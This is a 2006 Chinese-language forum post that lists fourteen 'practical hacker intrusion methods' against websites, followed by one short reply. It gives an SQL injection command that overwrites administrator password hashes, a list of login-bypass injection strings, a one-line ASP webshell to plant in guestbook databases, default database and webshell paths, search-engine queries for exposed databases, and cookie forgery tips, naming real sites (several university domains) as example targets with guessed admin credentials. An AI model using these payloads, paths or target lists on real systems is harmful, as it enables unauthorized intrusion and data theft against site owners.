我来我网
https://5come5.cn
 
您尚未 登录  注册 | 菠菜 | 软件站 | 音乐站 | 邮箱1 | 邮箱2 | 风格选择 | 更多 » 
 

本页主题: 揭密黑客网络入侵的十四种实用方法! 显示签名 | 打印 | 加为IE收藏 | 收藏主题 | 上一主题 | 下一主题

iguard



贝尔诺勋章 自信之戒
性别: 帅哥 状态: 该用户目前不在线
头衔: 要走了
等级: 版主
家族: 战略研究所
发贴: 11259
威望: 5
浮云: 407
在线等级:
注册时间: 2005-12-07
最后登陆: 2009-11-04

5come5帮你背单词 [ frighten /'fraitn/ vt. 使惊吓,吓唬;vi. 惊恐,害怕 ]


揭密黑客网络入侵的十四种实用方法!

发布日期: 2006-11-24 14:54:05 

  1.上传漏洞[不多讲]

  pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

  有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

  2.注入漏洞[不多讲]

  pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:

  http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’-- [admin为表名.]

  3.旁注,也就是跨站.

  我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了

  4.暴库:把二级目录中间的/换成%5c

  EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围BigClassType=1

  如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否 连接到文件存放的服务器。

  这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.


  5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

  ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a

  6.社会工程学。这个我们都知道吧。就是猜解。

  EY:http://www.neu.edu.cn/waishi/admin

  admin waishi

  7.写入ASP格式数据库。就是一句话木马[〈%execute request("value")%〉 ],常用在留言本.

  EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马

  8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.

  EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

  这个站用的是:杰出校友录,源码我下过了,

  默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin

  9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

  /Databackup/dvbbs7.MDB

  /bbs/Databackup/dvbbs7.MDB

  /bbs/Data/dvbbs7.MDB

  /data/dvbbs7.mdb

  /bbs/diy.asp

  /diy.asp

  /bbs/cmd.asp

  /bbs/cmd.exe

  /bbs/s-u.exe

  /bbs/servu.exe

  工具:网站猎手 挖掘鸡

  EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

  10.查看目录法:人一些网站可以断开目录,可以方问目录。

  EY:http://www.ujs168.com/shop/admin/

  http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

  这样我们可以找到数据库,下载不用我教吧

  11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

  12.搜索引擎利用:

  (1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

  (2).找网站的管理后台地址:

  site:xxxx.comintext:管理

  site:xxxx.comintitle:管理 〈关键字很多,自已找〉

  site:xxxx.cominurl:login

  (3).查找access的数据库,mssql、mysql的连接文件

  allinurl:bbsdata

  filetype:mdbinurl:database

  filetype:incconn

  inurl:datafiletype:mdb

  我主不做了。。自已做做吧。。

  13.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

  14.利用常见的漏洞:如动网BBS

  EY:http://js1011.com/bbs/index.asp

  可以先用:dvbbs权限提升工具,使自已成为前台管理员。

  THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

  这个我就不做了,网上教程多的是,自已下个看看。  

  工具:dvbbs权限提升工具  动网固顶贴工具 

  15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE  

  CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
顶端 Posted: 2006-11-24 23:30 | [楼 主]
【寳】貝→晨



性别: 帅哥 状态: 该用户目前不在线
等级: 栋梁之材
家族: 跑跑UesTc家族
发贴: 799
威望: 0
浮云: 1191
在线等级:
注册时间: 2006-11-23
最后登陆: 2009-03-14

5come5帮你背单词 [ hoop /hu:p/ n. 铁环 ]


看不懂
顶端 Posted: 2006-11-24 23:49 | [1 楼]
我来我网·5come5 Forum » 软件交流

Total 0.010551(s) query 6, Time now is:11-27 10:00, Gzip enabled
Powered by PHPWind v5.3, Localized by 5come5 Tech Team, 黔ICP备16009856号